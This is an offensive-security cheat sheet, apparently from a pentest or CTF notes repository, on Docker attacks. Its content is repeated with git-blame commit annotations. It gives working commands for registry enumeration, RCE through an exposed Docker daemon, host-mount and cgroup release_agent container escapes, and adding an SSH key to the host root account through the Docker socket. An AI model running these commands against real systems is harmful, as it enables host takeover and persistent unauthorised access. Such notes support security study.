killchain-compendium/misc/level3_hypervisor/docker_sec/docker.md

# Docker Vulnerabilities

## Abusing Registry
* [Registry Doc](https://docs.docker.com/registry/spec/api/)
* Registry is a json API endpoint
* Private registry added in `/etc/docker/daemon.json`
* Can be found by nmap as a service

### Enumeration
* General query
```sh
curl http://test.com:5000/v2/_catalog`
```
* List tags
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
```
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```

## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```

## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)

## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
    ```sh 
    docker -H tcp://test.com:2375 ps
    docker -H tcp://test.com:2375 exec <container> <cmd>
    ```

* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)

## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
```sh
find / -name "*sock"
groups
```

* Mount the host volume and chroot to it, need alpine image. 
```sh
docker images
```sh
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
or
```sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
```


## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS

* Requires root inside the container

* Execute command
```sh
nsenter --target 1 --mount sh
```

## Misconfiguration
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
```sh
capsh --print
```
* `man capabilities`

* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)

* Exploit
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## Check fdisk

* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
```sh
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev
```

## Creating a Container from inside another container

* Needs root inside a container
* Upload [static curl](https://github.com/moparisthebest/static-curl)
* Check available images and containers
```sh
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
```
* Inside the container as root
```sh
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
```
* Return value is the ID
* Start a container
```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
```
* Login in to the host via ssh

## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io

## runC
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)

## Securing a Container
* Least Privileges
* Seccomp
* Securing Registry via TLS

## Checking if you are inside a container
* Low process count
```sh
ps aux
```

* `.dockerenv` in `/`
```sh
cd / && ls -lah
```

* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```
second commit 2021-08-23 01:13:54 +02:00			`# Docker Vulnerabilities`

			`## Abusing Registry`
			`* [Registry Doc](https://docs.docker.com/registry/spec/api/)`
			`* Registry is a json API endpoint`
			* Private registry added in `/etc/docker/daemon.json`
			`* Can be found by nmap as a service`

			`### Enumeration`
			`* General query`
			```sh
			curl http://test.com:5000/v2/_catalog`
			```
			`* List tags`
			```sh
			`curl http://test.com:5000/v2/<REPO>/<APP>/tags/list`
			```
			* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
			```sh
			`curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>`
			```

			`## Reversing Docker Images`
			`* [Dive](https://github.com/wagoodman/dive)`
			```sh
			`dive <IMAGE-ID>`
			```

			`## Uploading Images to Registry`
			* Ever image has a `latest` tag
			* Upload modified docker image as `latest`
			`* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)`

			`## RCE via Exposed Docker Daemon`
			* Users inside the `docker` group may open tcp socket through docker
			* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
			* Confirming via `curl http://test.com:2375/version` on open docker port
			`* Execute commands on socket`
			```sh
			`docker -H tcp://test.com:2375 ps`
			`docker -H tcp://test.com:2375 exec <container> <cmd>`
			```

			`* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)`

			`## Escape Container via Exposed Docker Daemon`
			`* Looking for exposed docker sockets`
			```sh
			`find / -name "*sock"`
			`groups`
			```

bump 2021-10-23 02:03:06 +02:00			`* Mount the host volume and chroot to it, need alpine image.`
			```sh
			`docker images`
			```sh
second commit 2021-08-23 01:13:54 +02:00			```sh
			`docker run -v /:/mnt --rm -it alpine chroot /mnt sh`
			```
bump 2021-10-23 02:03:06 +02:00			`or`
			```sh
			`docker run -v /:/host --rm -it <imageID> chroot /host/ bash`
			```

second commit 2021-08-23 01:13:54 +02:00
			`## Shared Namespaces`
			`* Namespaces`
			`* Cgroups`
			`* OverlayFS`

			`* Requires root inside the container`

			`* Execute command`
			```sh
			`nsenter --target 1 --mount sh`
			```

			`## Misconfiguration`
			`* Privileged container connect to the host directly, not through the docker engine`
			`* Execution of bins on the host from libs inside the container is possible`
			```sh
			`capsh --print`
			```
			* `man capabilities`

			`* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)`

			`* Exploit`
			```sh
			`mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x`
			`echo 1 > /tmp/cgrp/x/notify_on_release`
			host_path=`sed -n 's/.\perdir=\([^,]\).*/\1/p' /etc/mtab`
			`echo "$host_path/exploit" > /tmp/cgrp/release_agent`
			`echo '#!/bin/sh' > /exploit`
			`echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit`
			`chmod a+x /exploit`
			`sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"`
			```
bump 2021-11-04 17:19:58 +01:00			`## Check fdisk`

			* `fdisk -l` and `lsblk`, host bulk device may be exposed
			`* Mount the device`
			```sh
			`mkdir /mnt/hostdev`
			`mount /dev/<hostVda> /mnt/hostdev`
			```

			`## Creating a Container from inside another container`

			`* Needs root inside a container`
			`* Upload [static curl](https://github.com/moparisthebest/static-curl)`
			`* Check available images and containers`
			```sh
			`curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json`
			`curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json`
			```
			`* Inside the container as root`
			```sh
			`curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'`
			```
			`* Return value is the ID`
			`* Start a container`
			```sh
			`curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start`
			```
			`* Login in to the host via ssh`

second commit 2021-08-23 01:13:54 +02:00			`## Dirty c0w`
			`https://github.com/dirtycow/dirtycow.github.io`

			`## runC`
			`[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)`

			`## Securing a Container`
			`* Least Privileges`
			`* Seccomp`
			`* Securing Registry via TLS`

			`## Checking if you are inside a container`
			`* Low process count`
			```sh
			`ps aux`
			```

			* `.dockerenv` in `/`
			```sh
			`cd / && ls -lah`
			```

			`* cgroups contain docker names`
			```sh
			`pwd /proc/1`
			`cat cgroups`
			```